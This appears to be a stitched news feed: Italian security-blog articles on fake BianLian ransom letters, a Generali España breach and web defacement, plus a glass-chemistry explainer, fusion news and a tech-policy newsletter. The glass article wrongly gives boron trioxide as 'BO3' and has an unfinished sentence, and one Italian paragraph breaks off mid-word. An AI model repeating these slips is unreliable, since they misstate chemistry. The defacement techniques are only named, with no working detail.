A differenza delle reali richieste di BianLian, le lettere affermano che non ci saranno ulteriori trattative con le vittime e danno loro 10 giorni di tempo per pagare il riscatto in Bitcoin.
Ogni lettera contiene un codice QR Code e un indirizzo di portafoglio Bitcoin per trasferire importi da 250.000 dollari a 500.000. Per le aziende mediche l’importo fisso è pari a 350.000 dollari.
Indirizzi wallet per il trasferimento di fondi in una lettera falsa (BleepingComputer)
Alcune e-mail contengono vere e proprie perdite di password per aumentare la credibilità minacce. Tuttavia, gli esperti non hanno trovato prove di veri e propri attacchi informatici. Secondo gli esperti di GuidePoint Security, le lettere non hanno alcun collegamento con il gruppo BianLian e rappresentano semplicemente un tentativo di intimidire i dirigenti aziendali affinché trasferiscano denaro ai truffatori.
Sebbene le e-mail non rappresentino una minaccia immediata, i reparti IT e di sicurezza dovrebbero avvisare i propri manager della nuova truffa. Questi messaggi sono un’evoluzione delle truffe un tempo diffuse tramite posta elettronica, ma ora prendono di mira i dirigenti di grandi aziende.
Intanto i rappresentanti del vero gruppo BianLian non hanno rilasciato dichiarazioni.
L'articolo Ora il Ransomware arriva per posta ordinaria! L’innovazione si firma Bianlian. Scopri i retroscena proviene da il blog della sicurezza informatica.
Big Chemistry: Glass
Humans have been chemically modifying their world for far longer than you might think. Long before they had the slightest idea of what was happening chemically, they were turning clay into bricks, making cement from limestone, and figuring out how to mix metals in just the right proportions to make useful new alloys like bronze. The chemical principles behind all this could wait; there was a world to build, after all.
Among these early feats of chemical happenstance was the discovery that glass could be made from simple sand. The earliest glass, likely accidentally created by a big fire on a sandy surface, probably wasn’t good for much besides decorations. It wouldn’t have taken long to realize that this stuff was fantastically useful, both as a building material and a tool, and that a pinch of this and a little of that could greatly affect its properties. The chemistry of glass has been finely tuned since those early experiments, and the process has been scaled up to incredible proportions, enough to make glass production one of the largest chemical industries in the world today.
Sand++
When most of us use the word “glass,” we’ve got a pretty clear mental picture of what the term refers to. But from a solid-state chemistry viewpoint, glass means more than the stuff that fills the holes in your walls or makes up that beer bottle in your hand. Glasses, or more correctly glassy solids, are a class of amorphous solids that undergo a glass transition. Unpacking that, amorphous refers to the internal structure of the material, which lacks the long-range structural regularity characteristic of a crystalline solid. Long range in this context is a relative term, and refers to distances of more than a few nanometers.
As for the glass transition bit, that simply refers to the material changing from a brittle, hard solid state to a viscous liquid as it is heated past its glass transition temperature. Coupled together, these properties mean that many materials can be glassy solids, including plastics and metals. For our purposes, though, glass refers to glassy solids made primarily of silicates, with other materials added to change the properties of the finished material.
To understand the amorphous structure of glass, we need to look at the starting material for manufacturing glass: quartz. Quartz is a crystalline solid made from silicon dioxide (SiO2), or silica. Inside the crystal, each silicon atom is bonded to four oxygen atoms, each of which forms a bridge to a neighboring silicon. This results in a tetrahedral unit cell, giving both natural and synthetic quartz many of their useful properties.
When quartz sand is ground up finely and heated above its melting point of 1,700C, the rigidly ordered crystal structure is disrupted and a thick, syrupy liquid forms. Cooling that liquid slowly would allow the crystal structure to reform, with the silicon atoms connected by a regular grid of bridging oxygen atoms. Glass production, though, uses faster cooling, which makes it harder for all the oxygen atoms to form bridges between the silicon atoms. The result is a disrupted pattern, with some silicon atoms bonded to four oxygens and some bonded to only two or three. This disrupts the long-range ordering seen in the original quartz crystals and results in the properties we normally associate with glassy solids, such as brittleness, low electrical conductivity, and a high melting temperature.The crystal structure of silicates is disrupted by sodium, calcium, and aluminum, lowering the melting point and viscosity of soda-lime glass. Source: Mrmw, CC0.
Glass made from pure silica sand is called fused quartz, and while it’s commercially valuable, especially in situations requiring extreme temperature resistance and transparency over a wide range of the optical spectrum, it also has some drawbacks. First, the extreme temperatures needed to melt pure quartz sand require a lot of energy, making fused quartz expensive to produce in bulk. Also, the liquid glass is extremely viscous, making it difficult.
Luckily, these properties can be altered by adding a few impurities to the melt. Adding about 13% sodium oxide (Na2O), 10% calcium oxide (CaO), and a percent or so of aluminum oxide (Al2O3) dramatically changes the physical and chemical properties of the mix. The sodium oxide generally comes from sodium carbonate (Na2CO3), which is known as soda, and the calcium carbonate comes from lime, which is limestone that has been heated. Together, the sodium and the calcium bind to some of the oxygen atoms in the silicates, blocking them from bridging to other silicates. This further disrupts any long-range interactions, lowering the melting point of the mix and decreasing its viscosity. The result is soda-lime glass, which accounts for about 90% of the 130 million tonnes of glass manufactured each year.
If You Can’t Stand the Heat…
Soda-lime glass is used for everything from food and beverage containers to window glass, with only slight adjustments to the mix of impurities to match the properties of the finished glass to the job. But if there’s one place where plain soda-lime glass falls short, it’s resistance to thermal shock. Thanks to the disruption of long-range interactions between silicates by sodium and calcium, soda-lime glass has a much higher coefficient of thermal expansion (CTE) than fused silica. This makes heating soda-lime glass risky, since the stress caused by expansion or contraction can cause the glass to shatter.
To lower the CTE of soda-lime glass, a small amount of boron trioxide (BO3) is added to the melt. The boron atoms bind to two oxygen atoms, which forms a bridge between adjacent silicates, albeit slightly longer than an oxygen-only bridge. This would seem to raise the CTE, but boron has another trick up its sleeve. Boron normally only accepts three bonds, but in the presence of alkali metals like sodium, it will accept one more. That means the sodium atoms will bond to the boron, keeping them from blocking more bridging oxygens. The result is borosilicate glass, which has a viscosity low enough to ease manufacturing and a low CTE to withstand thermal shock.
Borosilicate glass has been around for more than a century, most recognizably under the trade name Pyrex. It quickly became a fixture in kitchens around the world as the miracle cookware that could go from refrigerator to oven without shattering. Sadly, Corning no longer sells borosilicate glass cookware in the North American market, opting to sell tempered soda-lime glassware under the Pyrex brand since about 1998. True borosilicate Pyrex glass is most limited to the laboratory and industrial market now, although Pyrex cookware is still available in Europe.
The Glassworks
In a way, glass is a bit like electricity, which is largely consumed the instant it’s produced since there aren’t many practical ways to store it at a grid scale. Similarly, glass really can’t be manufactured and stored in bulk the way other materials like aluminum and steel can, and shipping tankers of molten glass from one factory to another is a practical impossibility. So a glasswork generally has a complete manufacturing process under one roof, with raw materials coming in one end and finished products going out the other. This also makes glassworks very large facilities, especially ones that make float glass.
Another way in which glass manufacturing is similar to electric generation is that both are generally continuous processes. Large base load generators are most efficient when they are kept rotating continuously, and spinning them up from a standing start is a long and tedious process. Similarly, glass furnaces, which are often classified by the number of metric tons of melt they can supply per day, can take days or weeks to get up to working temperature. That means the entire glass factory has to be geared around keeping the furnace fed with raw material and ensuring the output is formed into finished products immediately and continuously.
On the supply side of the glassworks is the batch house, which serves as a warehouse for raw material. Sand, soda, lime, and other bulk ingredients arrive by truck or rail and are stored in silos or piled onto the batch house floor. It’s vitally important that the raw ingredients stay clean and dry; the results of a wet mix being dumped into a furnace full of 1,500° molten glass don’t bear thinking. An important raw material is cullet, which is broken glass either from recycling or from the production process; adding cullet to the mix reduces the energy needed to melt the batch. Ingredients are weighed and mixed in the batch house and transported by conveyors to the dog house, an area directly adjacent to the inlet of the furnace where the mix is prewarmed to remove any remaining moisture before being pushed into the furnace by a pusher arm.
The furnace is made from refractory bricks and usually has a long and broad but fairly shallow pool covered by an arched roof. Most furnaces are heated with natural gas, although some electric arc furnaces are used. The furnace often has two zones, the melting tank and the working tank, which are separated by a wall with narrow openings. The temperatures of the two chambers are maintained at different levels, with the melting tank generally hotter than the working tank. The working tank also sometimes has chlorine gas bubbled through it to consolidate any impurities into a slag that floats to the surface of the melt, where it can be skimmed off and added to the cullet in the batch house.
youtube.com/embed/1HDWJgFLCfA?…
Float, Blow, Press, Repeat
After the furnace, the liquid glass enters the cold end of the glassworks. This is a relative term, of course, since the glass is still incandescent at this point. How it exits the furnace and is formed depends on the finished product. For sheet glass such as architectural glass, the float process is generally used. Liquid glass exiting the furnace is floated on top of a pool of molten tin, which is denser than the glass. The liquid glass spreads out over the surface of the tin, forming wide sheets of perfectly flat glass. The thickness and width of the sheet can be controlled by rollers at the edge of the tin pool, which grab the glass sheet and pull it along.
Float baths can be up to four meters wide and 50 meters or more long, over which length the temperature is gradually reduced from about 1,100° to 600°. At that point, the glass rolls off the tin bath onto rollers and enters a long annealing oven called a lehr, which drops the temperature over 100 meters or more before the sheets are cut. The edges, which were dimpled by the rollers in the float bath, are cut off by scoring with diamond wheels and snapping with rollers, with the off-cuts added to the cullet in the batch house. The glass ribbon is cut to length by a scoring wheel set at an angle matched to the speed of the conveyor to make straight scores across the sheet and snapped by a conveyor belt that raises up at just the right time to snap the sheet.
Float glass often goes through additional post-processing modifications, such as tempering. While it’s still quite hot, float glass can be rapidly cooled with jets of air from above and below. This creates thin layers on both faces that have solidified while the core of the sheet is still fluid, putting the faces into tension relative to the core, which is in compression. This dramatically toughens the glass compared to plain annealed glass, and when it does break, the opposed forces within the glass force it to shatter into small fragments rather than large shards.
For hollow glass products, the arrangement of the cold end forming machines is a bit different. Rather than flowing horizontally out of the furnace, melted glass drops through holes in the bottom of the tank. Large shears close at intervals to cut the stream of molten glass into precisely sized pieces called gobs, which drop into curved chutes. The chutes rotate to direct the gobs into an automatic molding machine.
Molding something like a bottle is a multistage process, with gobs first formed into a rough hollow shape called a parison. The parison can be formed either by pressing the gob into an upside-down mold with a plunger to form a cavity, or by blowing compressed air into the mold from below. Either way, the parisons are flipped rightside-up by the molding machine and moved to a second mold, where the final shape of the bottle is formed by compressed air before being pushed onto a conveyor that takes the bottles to an annealing lehr. The entire process from furnace to formed bottle only takes a few seconds, and never stops.
youtube.com/embed/EL3gy4G0gcY?…
Some glass hollowware products, such as pie plates, baking dishes, and laboratory beakers, do not need to be blown at all. Rather, these are press molded by dropping gob directly into one half of a mold and pressing it with a matching mold. The mold halves squeeze the molten glass into its final shape before the mold opens and the formed item is whisked away for annealing
No matter what the final form of the glass being produced, the degree of coordination required to keep a glass factory running smoothly is pretty amazing. The speed with which ingredients are added to the furnace has to match the speed of finished products being taken off the line at the end, and temperatures have to be rigidly controlled all along the way. Also, all the machinery has to be engineered to withstand lava-like temperatures without breaking down; imagine the mess that would result if a furnace broke down with a couple of tonnes of molten glass in it. Also, molding machines have to deal with the fact that molds only last a few shifts before they need to be resurfaced, lest imperfections creep into the finished products. This means taking individual molding stations out of service while the rest stay in production, all while maintaining overall throughput.
Attacco Informatico a Generali España. Ancora un attacco alla Supply Chain
Generali España, filiale del gruppo assicurativo Assicurazioni Generali S.p.A., ha subito un accesso non autorizzato ai propri sistemi informatici. La notizia è stata diffusa da VenariX en Español, una piattaforma che monitora le minacce informatiche.
Generali, tra le più grandi compagnie assicurative al mondo, è presente in Spagna con una vasta gamma di prodotti assicurativi e finanziari. Secondo quanto riportato, la società sta lavorando per mitigare i rischi e proteggere i dati sensibili dei clienti. Non sono stati ancora diffusi dettagli su eventuali conseguenze o furti di informazioni.
Questo è quanto riportato all’interno della print screen presente nel tweet di VenariX: “siamo costretti a informarla che abbiamo rilevato un incidente di sicurezza informatica presso Generali Seguros y Reaseguros, S.A.IJ., che ha portato una terza parte ad accedere al nostro Sistema Informativo, sostituendo le credenziali di un utente autorizzato, e ha causato l’esposizione di parte delle informazioni relative alla polizza auto da lei sottoscritta e che conserviamo dal momento della sottoscrizione della polizza in conformità ai nostri obblighi legali e contrattuali.”
Ennesimo attacco alla supply chain
Pertanto, l’incidente si configura come un attacco alla supply chain, ovvero un attacco che prende di mira non solo un’azienda specifica, ma anche i suoi fornitori, partner e sistemi interconnessi. La supply chain rappresenta l’intero ecosistema di servizi, software e infrastrutture che un’organizzazione utilizza per operare. Colpire un singolo anello della catena può generare un effetto domino, compromettendo più soggetti e amplificando l’impatto della violazione.
La direttiva NIS2, adottata dall’Unione Europea, mira proprio a rafforzare la sicurezza della supply chain imponendo obblighi più stringenti per le aziende considerate “essenziali” e “importanti”. Tra le novità introdotte, vi sono requisiti di gestione del rischio più severi, maggiore responsabilità per i dirigenti e una sorveglianza rafforzata sugli incidenti che coinvolgono fornitori terzi.
Per proteggersi da questi attacchi, le aziende devono adottare una strategia di cyber resilience basata su tre pilastri: verifica rigorosa dei fornitori, monitoraggio continuo delle reti e implementazione di misure di sicurezza avanzate come la segmentazione della rete e l’adozione di soluzioni zero trust. Solo attraverso un approccio proattivo è possibile ridurre i rischi e mitigare gli effetti di eventuali violazioni.
Generali Spagna
Presente in Spagna dal 1834, GENERALI è uno dei principali attori del mercato assicurativo spagnolo. L’azienda conta circa 2.000 dipendenti e una delle reti di consulenti più grandi del Paese, con oltre 1.600 uffici di assistenza clienti e 10.000 professionisti.
GENERALI focalizza la propria strategia sull’offerta di un’esperienza eccellente ai propri clienti. Per raggiungere questo obiettivo, ha sviluppato il progetto pionieristico di sondaggi denominato TNPS, attraverso il quale ogni anno vengono effettuati più di 900.000 sondaggi per conoscere l’opinione dei clienti. Grazie alle informazioni raccolte, l’azienda è in grado di migliorare costantemente i propri processi e la qualità del servizio offerto.
Nel suo impegno verso l’innovazione come leva di crescita, GENERALI mette a disposizione dei propri clienti prodotti e servizi telematici all’avanguardia e spazi di gestione privati come My GENERALI. Tutti questi sviluppi soddisfano i più elevati standard di usabilità, in modo che i clienti e i canali di distribuzione possano svolgere qualsiasi tipo di procedura in modo rapido e semplice.
Questo articolo è stato redatto attraverso l’utilizzo della piattaforma Recorded Future, partner strategico di Red Hot Cyber e leader nell’intelligence sulle minacce informatiche, che fornisce analisi avanzate per identificare e contrastare le attività malevole nel cyberspazio.
L'articolo Attacco Informatico a Generali España. Ancora un attacco alla Supply Chain proviene da il blog della sicurezza informatica.
China Claims Commercial Nuclear Fusion by 2050 as Germany Goes Stellarator
Things are heating up in the world of nuclear fusion research, with most fundamental issues resolved and an increasing rate of announcements being made regarding commercial fusion power. China’s CNNC is one of the most recent voices here, with their statement that they expect to have commercial nuclear fusion plants online by 2050. Although scarce on details, China is one of the leading nations when it comes to nuclear fusion research, with multiple large tokamaks, including the HL-2M and the upcoming CFETR which we covered a few years ago.Stellaris stellarator. (Credit: Proxima Fusion)
In addition to China’s fusion-related news, a German startup called Proxima Fusion announced their Stellaris commercial fusion plant design concept, with a targeted grid connection by the 2030s. Of note is that this involves a stellarator design, which has the major advantage of inherent plasma stability, dodging the confinement mode and Greenwald density issues that plague tokamaks. The Stellaris design is an evolution of the famous Wendelstein 7-X research stellarator at the Max Planck Institute.
While Wendelstein 7-X was not designed to produce power, it features everything from the complex coiled design and cooled divertors plus demonstrated long-term operation that a commercial reactor would need. This makes it quite likely that the coming decades we’ll be seeing the end spurt for commercial fusion power, with conceivably stellarators being the unlikely winner long before tokamaks cross the finish line.
How to navigate Washington and Brussels: a tech policy guide
ANOTHER WEEK, ANOTHER DIGITAL POLITICS. I'm Mark Scott, and will be in Washington next week — come say hello at an event I'm co-hosting on March 11 with Katie Harbath (and her excellent Anchor Change newsletter.)
I'll also be in Geneva on March 24 for a discussion on tech sovereignty and data governance (sign up here) and will be co-hosting another tech policy gathering in London on March 27 (sign up for more upcoming details here.)
— Under the Trump 2.0 administration, tech policy is now inextricably tied to trade and foreign policy. That's not so different than from before.
— The European Commission is reassessing its focus on digital regulation. That change is almost exclusively down to internal, not external, pressures.
— Artificial intelligence companies are in an arms race to sign up as many publishers worldwide to feed their large language models.
Let's get started:
Washington: same message, different delivery
AFTER DONALD TRUMP'S MEETING WITH Volodymyr Zelenskyy in the Oval Office last week, tech policy is certainly not at the top of anyone's agenda when it comes to souring transatlantic relations. But as I get ready for a week in North America (Washington: March 10-12; Montréal: March 13-14), it's time to unpack what the first six weeks of the new Trump administration means, both for America and the rest of the world, when it comes to digital.
At first glance, there appears to be a significant shift. In repeated White House executive orders, directives and policy decisions, the US president has signaled his dislike for greater checks on (American) tech companies. Gone is United States support for the global tax revamp, negotiated by the Organization for Economic Cooperation and Development (OECD). Gone is the support for greater content moderation on social media platforms — and the rise of threats if other countries follow that path. Gone is Washington's support for checks on artificial intelligence, including parts of an White House executive order from a Joe Biden-era. Gone is support for TikTok's ban within the US — a policy that Trump championed during his first term.
Taken as a whole, it feels like a upending of Washington's consensus that technology firms needed to be reined in; that cooperation with like-minded allies helped promote US economic interests; and that pushing back against foreign adversaries, in the online world, was a national security priority.
And yet, I'm not so sure.
It's sometimes easy to forget how past administrations acted when a new White House resident has his feet under the table. Dating back to Barack Obama's time in charge, consecutive US presidents have repeatedly pushed back against greater checks — from non-US countries — even when they promoted potential curbs at home. Obama, for instance, famously chided members of the European Parliament when they suggested that Google should be broken up. Let's leave aside the fact those lawmakers didn't have such powers. But fast forward a decade, and the European Union has never realistically considered forcing the split of these tech giants. But do you know who has? The US Department of Justice and its ongoing antitrust lawsuit against Alphabet and its dominance over search.
Let's look at other examples. Both Trump 1.0 and Biden's administrations, collectively, were never that excited about revamping the world's global tax regime — mostly because it would allow others to levy taxes against US tech firms. Washington would still come out net positive under those proposals, based on OECD calculations, as the US would earn additional revenue from taxing non-American firms, too. But the idea that pesky foreigners would impose levies on some of the most prominent US companies was something that garnered bipartisan anger.
Thanks for reading the free version of Digital Politics. Paid subscribers receive at least one newsletter a week. If that sounds like your jam, please sign up here.
Here's what paid subscribers read in February:
— How changing geopolitics affects platform governance, digital competition, internet governance, trade and data protection. More here
— What happens when the US doesn't follow the game plan in combating 'hybrid warfare?;' What lessons to take from the Paris AI Action Summit?; Fact-checkers underpin crowdsourced 'community notes.' More here.
— Germany's federal election is reminder we don't know what happens on social media; The first transatlantic fight over digital won't come around social media rules; What the global tax overhaul would have meant for tech. More here.
— In the wake of the German election, we shouldn't claim 'mission accomplished' when it comes to fighting foreign interference. More here.
I can go on. Yes, the Trump administration has a longstanding opinion that all forms of online safety/content moderation regulation represent an illegitimate attack on free speech. I would disagree with that assessment, but that is the current White House's starting point. And yes, current US officials are open about their willingness to use trade sanctions against regions/countries (the EU and United Kingdom have been specifically name-checked for attention) that impose such regimes that Trump 2.0 believes represent unfair trading practices against US firms.
But as someone who had a front row seat to the crafting of the EU's Digital Services Act, I remember well that the former Biden administration equally pushed back hard against what it similarly believed was unfair practices from Brussels primarily targeted at Silicon Valley. Yes, these officials did it mostly behind closed doors and in support of some tech firms. But the message — while not as vocal or transactional as the current White House — was clear: these content moderation rules are bad, and the EU should cut it out.
Where I do get confused is how part of the Trump 2.0 team appears to be copying, almost word for word, the transparency and accountability parts of international online safety regimes. The same rules, it should be pointed out, that allegedly represent a fundamental threat to people's free speech. The US Federal Trade Commission's recent request for information "regarding technology platform censorship," for instance, includes language around how these firms made their content moderation decisions that would not be out of place in European-style legislation.
"Did the policies or other public-facing representations describe how, when, or under what circumstances the platform would deny or degrade users’ access to its services?," one of the FTC question asks. "Did the platform offer a meaningful opportunity to challenge or appeal adverse actions that deny, or degrade users’ access, consistent with its users’ reasonable expectations based on its representations?," says another. Those questions are equally at the center of what non-US officials want to understand, too.
I get the public differences between how Trump 2.0 and previous administrations have approached these issues. And on other aspects — particularly in relation to artificial intelligence and short-term equality issues on datasets — there are significant differences.
But when I peel back the rhetoric and look at the underlying policies, what are the differences in how the current White House approaches digital compared to its predecessors? In officials like Michael Kratsios, director of the White House Office of Science and Technology Policy, and Gail Slater, the new head of the US Department of Justice's antitrust division, Trump 2.0 has picked well-qualified policymakers that aren't that different from who was in charge, only months ago, during Biden's time in charge.
One group I haven't mentioned is lawmakers in Congress. Sigh. The US House of Representatives and Senate certainly like to talk a good game on digital policy. (Anyone remember Chuck Schumer's AI Insight forums?) But I remain skeptical about any form of tech legislation making its way through Congress — mostly because it's not a high priority in the current political climate.
Some officials talk about renewed impetus for federal privacy rules (I've heard that before.) Others say more targeted legislation around online kids safety could win bipartisan support. Again, I have doubts.
But, if you take the recent US Inflation Reduction Act and US Chips Act — and their impact on the American domestic tech industry, as whole — then the view of Congress doesn't look too bad. Yes, the future of some of that legislation is in jeopardy under Trump 2.0. But, combined, the laws doubled down on US tech investment; provided federal subsidies to entice companies to spend locally; and positioned the country on a favorable footing in the increasingly geopolitical world that encompasses tech in 2025.
To me, that feels like a pretty familiar pitch no matter who currently resides in the White House.
Chart of the Week
TO COMPETE IN THE CUT-THROAT AI RACE, companies are rushing to pen deals with some of the largest newsletters and media outlets in the world.
The goal? To feed these firms' large language models with high-quality content that can make sophisticated systems more lifelike when they respond to real-world queries.
For publishers, it's a race for survival. Many have argued that AI companies have already scraped their sites — and the New York Times has sued OpenAI and Microsoft. But for others, these tech companies offer a new revenue opportunity to keep their legacy media businesses afloat.Source: Ezra Eeman — which publishers have signed partnerships with individual AI firms
Brussels: different message, same delivery
CONVENTIONAL WISDOMS DICTATES that Brussels is firing on all cylinders. The EU has its shiny online safety rules (the Digital Services Act) and digital antitrust legislation (the Digital Markets Act), as well as the upcoming Artificial Intelligence Act — the world's first comprehensive rulebook for the emerging technology. In Ursula von der Leyen, the returning German head of the European Commission, the EU's executive branch, the 27-country bloc has a leader who helped pass those rules. Now, she's ready to wield them aggressively.
That is outdated thinking.
Yes, the EU is in the midst of implementing new digital rules, many of which have never been tested before. The Digital Markets Act's shift to ex ante oversight, or allowing regulators to determine where market abuse may happen before it occurs, is a significant departure from decades of competition jurisprudence, for instance. The Digital Services Act's transparency and accountability provisions for social media companies and search engines — that do not require platforms to remove legal content, to be clear — are being watched by other countries eager to follow that approach.
And yet, the political and economic winds have significantly shifted in Brussels.
For now, let's leave aside the increasingly fraught relationship between the EU and US after decades of close ties. Within the bloc, ongoing sluggish economic output and a failure to capture the next generation of technology advances by European firms have fundamentally altered how EU officials now approach questions around digital policymaking. At the center of that switch is last year's report from Mario Draghi, the former head of the European Central Bank. In his analysis, the ex-Italian prime blamed overburdensome regulation — including the AI Act and the EU's General Data Protection Regulation, or comprehensive privacy regime — for hamstringing the bloc's economy compared to international rivals.
That ethos has taken hold at the top of the European Commission. I would disagree that all regulation/legislation leads to poor economic outcomes, especially in the digital space. Personally, a lack of coordination EU-wide capital markets and a failure to create a "digital single market" across the 27 countries is more to blame for Europe's lack of tech champions. For me, generations of tech regulation is a secondary issue when, say, a Swedish startup founder can not easily reach out to an Italian investor to back her company to sell into a unified online market from Finland to Greece. But hey, I'm not a former head of the European Central Bank.
This 'de-regulate at all costs!' mantra is now playing out in how Brussels approaches digital. When I saw Henna Virkkunen, the newly-appointed European Commission executive vice president in charge of tech, at the Paris AI Action Summit, the Finnish politician wanted to talk about the EU's Apply AI Strategy and AI Factories initiative — policies aimed at using public funds to jumpstart European companies' use of the emerging technology. In her 10 minute speech, I counted at least 10 references to "innovation," and only a couple of mentions of "regulation." It's not a perfect metaphor for what's happening. But it's pretty close.
Sign up for Digital Politics
Thanks for getting this far. Enjoyed what you've read? Why not receive weekly updates on how the worlds of technology and politics are colliding like never before. The first two weeks of any paid subscription are free.
Subscribe
Email sent! Check your inbox to complete your signup.
No spam. Unsubscribe anytime.
To a degree, this makes sense. The EU's economy remains sluggish, and Brussels can't realistically compete with Beijing and Washington on the global stage if it doesn't have a homegrown tech industry. That goes for everything from AI startups to industrial champions making electric vehicles. All the best (or worst?) digital rules in the world don't matter if non-EU countries look at how that legislation hasn't helped local businesses, and say 'no thanks.' Caveat: such legislation is also about protecting citizens' from harm, but I digress.
This change of focus — where even returning EU officials who helped to craft these rules in the previous European Commission's tenure are shifting their policymaking approach — will inevitably have an impact on how digital rules are created.
Already, Brussels has shelved its so-called AI Liability Directive over concerns it would harm growth. I have questions about how future investigations, under the Digital Services Act and Digital Markets Act, will be pushed if such probes signal to all countries (both EU and non-EU) that the bloc isn't open for business. The AI Act's full implementation is still about 18 months away, and I equally question what resources will be provided to make sure those rules are effective given the change in political priorities at the top of the European Commission.
Much of this nuance is getting lost in the EU-US diplomatic spat over Washington's aversion to Brussels' regulatory rulebook. European fears over American retaliatory tariffs are certainly worrying many within the EU — both inside the so-called Brussels Bubble and across national capitals.
But it's the 180-degree internally-focused turn within the 27-country bloc that's driving the wider change in the EU's mood music around digital regulation.
No, the existing rules aren't going away — and will lead to likely enforcement actions against (some) American firms, given the ongoing probes into Meta, Alphabet and X, among others. Yet the era of 'let them have more digital rules!' is over within the EU. And that shift is coming from within, not from outside.
What I'm reading
— The geopolitical race on AI is fundamentally reshaping international data flows and leading to regulatory fragmentation, argue Christopher Kuner and Gabriela Zanfir-Fortuna for the Future of Privacy Forum.
— Japan approved new AI legislation that represents a so-called 'light touch' approach to the technology, and will require companies to voluntarily cooperate with Tokyo's safety measures. More here and here.
— The European Union and India held their second Trade and Technology Council meeting in New Delhi on Feb 28. Here are the outcomes.
— OpenAI updated its analysis on how malign actors were using its technology for 'malicious uses.' More here.
— The European Fact-Checking Standards Network condemned a recent police raid on its Serbian member organization Istinomer.rs. More here.
Alla Scoperta dei Deface: tra Hacktivismo Cibernetico, Psy-Ops e Cyber Warfare
Negli ultimi anni, il fenomeno del defacement di siti web ha subito un’evoluzione significativa. Se un tempo rappresentava principalmente una forma di protesta digitale da parte di gruppi hacktivisti, oggi si intreccia sempre più con la guerra psicologica, informatica e le operazioni di disinformazione.
Il defacement, o “deface”, consiste nella modifica non autorizzata di una pagina web, spesso per trasmettere messaggi politici, ideologici o propagandistici. Ma quali sono le dinamiche dietro questi attacchi?
E quali implicazioni hanno nell’attuale contesto geopolitico?
Il defacement: un’arma dell’hacktivismo
L’hacktivismo (in inglese hacktivims che nasce dall’unione di “hacking” ed “Attivism”), ha utilizzato il defacement come strumento di protesta sin dagli anni ’90. Gruppi come Anonymous e LulzSec hanno spesso attaccato siti governativi e aziendali per denunciare corruzione, censura e violazioni dei diritti umani. Questo tipo di attacco ha il vantaggio di essere visibile e di avere un forte impatto mediatico senza necessariamente causare danni permanenti ai sistemi informatici.
Un esempio storico è il deface della NASA del 2013, quando gli hacktivisti modificarono le pagine ufficiali cdel sito dell’agenzia spaziale statunitense. Tuttavia, l’hacktivismo basato sui deface è spesso criticato per la sua inefficacia a lungo termine: sebbene possa attirare l’attenzione su determinate cause, raramente porta a cambiamenti concreti.
Deface del 2013 della NASA da parte del Master Italian Hackers Team che a seguito delle indagini venne scoperto di essere stato eseguito da un hacker italiano.
L’invasione russa dell’Ucraina ha visto un’escalation senza precedenti di attività di hacktivismo, con numerosi gruppi schieratisi a sostegno di una delle due fazioni. Da un lato, gruppi pro-Russia come Killnet e Noname057(16) hanno condotto attacchi DDoS su larga scala contro infrastrutture critiche e siti governativi occidentali, cercando di destabilizzare la rete informatica dei loro avversari. Dall’altro, attori filo-ucraini, tra cui alcuni affiliati ad Anonymous, hanno risposto con attacchi mirati a siti russi, spesso utilizzando il defacement per diffondere messaggi contro il Cremlino e minare la propaganda di Mosca.
In particolare, Anonymous Italia, un gruppo che in passato ha effettuato numerosi defacement contro siti russi diffondendo il loro supporto verso i valori occidentali e verso l’ucraina. Il defacement, in questo contesto, si è rivelato uno strumento di guerra psicologia, capace di manipolare la percezione pubblica e l’opinione internazionale. Sebbene
Dalla protesta alla cyber war: quando il deface diventa strategico
Se in passato i defacement erano prevalentemente azioni simboliche, oggi sempre più spesso si inseriscono in strategie di guerra cibernetica. Stati e gruppi di cyber mercenari (o milizia cyber) utilizzano il deface non solo per propaganda, ma anche per diffondere disinformazione e destabilizzare i nemici.
Un caso esemplare è quello dei gruppi filo-russi e filo-ucraini che, dal 2022, si sono impegnati in campagne di defacement contro siti governativi, banche e media. L’obiettivo non è solo mostrare superiorità tecnica, ma anche minare la fiducia nelle istituzioni colpite e diffondere narrazioni favorevoli alla propria parte.
Questa transizione dall’hacktivismo verso la psyops e cyber war mostra come il cyberspazio sia diventato un nuovo campo di battaglia, dove l’informazione è un’arma tanto potente quanto i malware più sofisticati.
#OpSaveGaza; l’operazione di Luglio del 2014 di Anonymous_Arabe in relazione alle tensioni sulla striscia di Gaza
Tecniche e strumenti utilizzati nei defacement
Il defacement può avvenire attraverso diverse tecniche, a seconda delle vulnerabilità sfruttate dagli attaccanti. Tra i metodi più comuni troviamo:
- SQL Injection: permette di ottenere accesso ai database di un sito web e modificarne i contenuti.
- Exploiting di CMS vulnerabili: molte piattaforme, come WordPress e Joomla, sono prese di mira se non aggiornate.
- Credential stuffing: utilizzando credenziali rubate, gli hacker possono accedere ai sistemi di gestione del sito.
- Remote Code Execution: sfruttamento di bug di sicurezza e CVE note/0day per effettuare un accesso malevolo al sistema ed effettuare modifiche strutturali delle pagine
Per contrastare questi attacchi, le organizzazioni devono implementare buone pratiche di sicurezza, come aggiornamenti costanti, protezioni WAF (Web Application Firewall) e monitoraggio attivo delle minacce.
Il futuro dei deface: tra nuove minacce e misure di difesa
In un contesto di guerra ibrida, dove le operazioni cibernetiche si combinano con azioni di guerra tradizionale, il deface potrebbe diventare sempre più uno strumento di guerra psicologica (psyops). Un esempio è la possibilità di alterare siti di news per diffondere fake news credibili e manipolare l’opinione pubblica.
Le operazioni di guerra psicologica nel cyberspazio non si limitano al defacing, ma includono una gamma di tattiche come la manipolazione dei social media, la diffusione di propaganda attraverso botnet e la creazione di deepfake per screditare figure pubbliche o influenzare eventi geopolitici.
L’hacktivismo, spesso considerato un fenomeno separato dalla cyber war, può invece sovrapporsi alle psyops quando gruppi come Anonymous o altri collettivi che sfruttano gli attacchi DDoS, leak di documenti e sabotaggi digitali per influenzare la percezione pubblica e la narrativa politica. In scenari di conflitto, stati-nazione potrebbero anche sfruttare gruppi hacktivisti come proxy per condurre operazioni di disinformazione senza esporsi direttamente.
Un esempio storico è l’uso delle cyber psyops nel conflitto Russia-Ucraina, dove attori statali e non statali hanno alterato siti web, diffuso false notizie e sfruttato social media per destabilizzare il nemico. Questo dimostra come la guerra dell’informazione e le operazioni di influenza possano avere un impatto strategico, influenzando non solo l’opinione pubblica, ma anche le decisioni militari e politiche.
Deface utilizzato anche dalle forze dell’ordine
